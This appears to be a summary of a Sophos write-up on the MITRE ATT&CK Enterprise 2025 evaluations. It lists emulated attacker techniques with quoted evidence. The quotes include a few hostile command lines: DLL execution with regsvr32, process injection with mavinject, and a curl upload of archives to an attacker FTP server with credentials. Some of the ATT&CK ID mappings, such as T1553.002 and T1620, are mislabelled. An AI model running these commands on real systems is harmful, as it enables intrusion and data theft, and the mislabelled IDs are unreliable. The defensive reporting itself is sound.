Game of clones: Sophos and the MITRE ATT&CK Enterprise 2025 Evaluations

MITRE Techniques

• [T1566.001] Spearphishing Link – Initial access via a targeted email linking to an AiTM page: ‘ACTION: SSO Updates Completed – Reauthentication Needed.’
• [T1539] Steal Web Session Cookie – Session replay used to obtain SSO session cookies and authenticate without prompting: ‘When tlannister authenticated to the AiTM site, the threat actor obtained valid static credentials and Single Sign On (SSO) session cookies.’
• [T1078] Valid Accounts – Use of stolen SSO cookies and device registration to access integrated applications and AWS console: ‘Replaying the stolen cookies provided access to the SSO solution, with a valid account for the organization.’
• [T1021.001] Remote Services: RDP – Remote Desktop used to access an on-prem host (dragongate) after SSO device enrollment: ‘They then successfully connected to the host dragongate via Remote Desktop (RDP).’
• [T1082] System Information Discovery – Basic discovery commands executed via cmd.exe (whoami, ping, wmic product get name, version): ‘whoami: returns active user’s domain and username’ and ‘wmic product get name, version.’
• [T1087] Account Discovery – Active Directory enumeration with ADExplorer to list Domain Admins and admin groups: ‘downloaded the Active Directory enumeration tool ADExplorer … to explore administrator groups.’
• [T1574] Hijack Execution Flow (DLL side-loading) – DLL sideloading used to execute malicious payloads via legitimate signed binaries (EssosUpdate.exe / wsdebug_host.exe and libcurl.dll): ‘the binary EssosUpdate.exe – a legitimate Windows application … that sideloaded a malicious DLL, wsdapi.dll.’
• [T1218.011] Signed Binary Proxy Execution (regsvr32) – regsvr32 used to re-execute the sideloaded DLL: ‘C:WindowsSystem32regsvr32.exe /s “C:UsershtargaryenDownloadswsdapi.dll”‘
• [T1055] Process Injection – mavinject used to inject wsdapi.dll into waitfor.exe for C2 persistence and execution: ‘mavinject.exe 8344 /INJECTRUNNING “C:UsershtargaryenDownloadswsdapi.dll”‘
• [T1059.001] Command and Scripting Interpreter: PowerShell – Remote PowerShell commands executed via AWS Systems Manager document AWS-RunPowerShellScript: ‘the threat actor ran the AWS Systems Manager document AWS-RunPowerShellScript to execute a PowerShell command on multiple instances.’
• [T1021] Remote Services (PsExec) – PsExec used for lateral movement to drop and execute CodeHelper.bat and establish a VSCode tunnel: ‘The ORPHEUS threat actor used PsExec for lateral movement, to drop and execute the script CodeHelper.bat.’
• [T1553.002] Subvert Cloud Provider Trust (SSO/SAML abuse) – SAML-based SSO was used to assume roles and access the AWS console without MFA: ‘AwsConsoleSignIn event … assumed an SSO role via the Authentik SAML provider … A login via SAML, but without multifactor authentication (MFA).’
• [T1530] Data from Cloud Storage Object (exfiltration to S3) – Data staged to an S3 bucket and transferred to an attacker-controlled S3 bucket in another account using CyberDuck: ‘transferred files from the staging S3 bucket in the targeted organization’s AWS account to an attacker-controlled S3 bucket in another AWS account.’
• [T1041] Exfiltration Over C2 Channel / Exfiltration Over Other Network Medium – Exfiltration using AirByte to stage files and curl/FTP to transfer archives to an attacker FTP server: ‘curl.exe -T … ftp://ftp_user:Gracious-Coat@[IP]/dp/ –ftp-create-dirs’ and ‘AirByte … staged files … to an S3 bucket.’
• [T1204.002] User Execution: Malicious File – Initial access via malicious Office document and LNK that executed a sideloaded binary: ’embedded link … download of the archive file … contained a LNK file … which executed the binary EssosUpdate.exe.’
• [T1620] Cloud API Monitoring / Discovery (Secrets Manager access) – Secrets Manager ListSecrets and GetSecretValue calls used to discover and decrypt a GitLab PAT: ‘invoking the AWS Secrets Manager ListSecrets command … BatchGetSecretValue and GetSecretValue … Gitlab Personal Access Token secret for the user atargaryen … DecryptValue.’